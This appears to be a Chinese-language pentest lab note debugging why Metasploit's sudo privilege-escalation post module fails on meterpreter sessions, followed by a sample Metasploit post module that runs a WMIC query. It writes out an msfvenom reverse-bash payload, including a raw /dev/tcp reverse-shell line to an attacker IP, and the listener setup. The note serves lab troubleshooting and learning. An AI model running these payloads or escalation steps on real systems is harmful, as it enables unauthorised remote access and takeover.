起因：sudo -s提权在msf上一直报错，但是在靶机上是可以成功提权的。

msf有一个模块，叫做post/multi/manage/sudo

看过这个模块的源码，就是使用sudo -s来提权的。

为什么会提权失败呢？

环境配置复现，debug

设置msf监听

handler -H 192.168.123.123 -P 6677 -p cmd/unix/reverse_bash

生成反弹shell的载荷

msfvenom -p cmd/unix/reverse_bash  lhost=192.168.123.123 lport=6677 -f raw      

0<&165-;exec 165<>/dev/tcp/192.168.123.123/6677;sh <&165 >&165 2>&165

设置metapreter session

使用上一条命令获得一个shell cmd/unix类型的shell以后，可以使用session -u session的ID 这种方式，获得一个meterpreter x86/linux的session。

使用meterpreter的session，执行post/multi/manage/sudo提权载荷，会报错。

[!] SESSION may not be compatible with this module.

使用shell cmd/unix的载荷不会报错。

查看源码

vi /usr/share/metasploit-framework/modules/post/multi/manage/sudo.rb

在第32行，如果没有meterpreter这一个关键字，那么就只支持shell类型的session

 'SessionTypes'  => [ 'meterpreter', 'shell' ]

如何写一个msf插件

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::WMIC

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Gather Run Specified WMIC Command',
      'Description'   => %q{ This module will execute a given WMIC command options or read
        WMIC commands options from a resource file and execute the commands in the
        specified Meterpreter session.},
      'License'       => MSF_LICENSE,
      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptPath.new('RESOURCE', [false, 'Full path to resource file to read commands from.']),
        OptString.new('COMMAND', [false, 'WMIC command options.']),
      ])
  end

  # Run Method for when run command is issued
  def run
        print_status("Executing command")
        command = wmic_query("useraccount get name")
        puts command
  end
end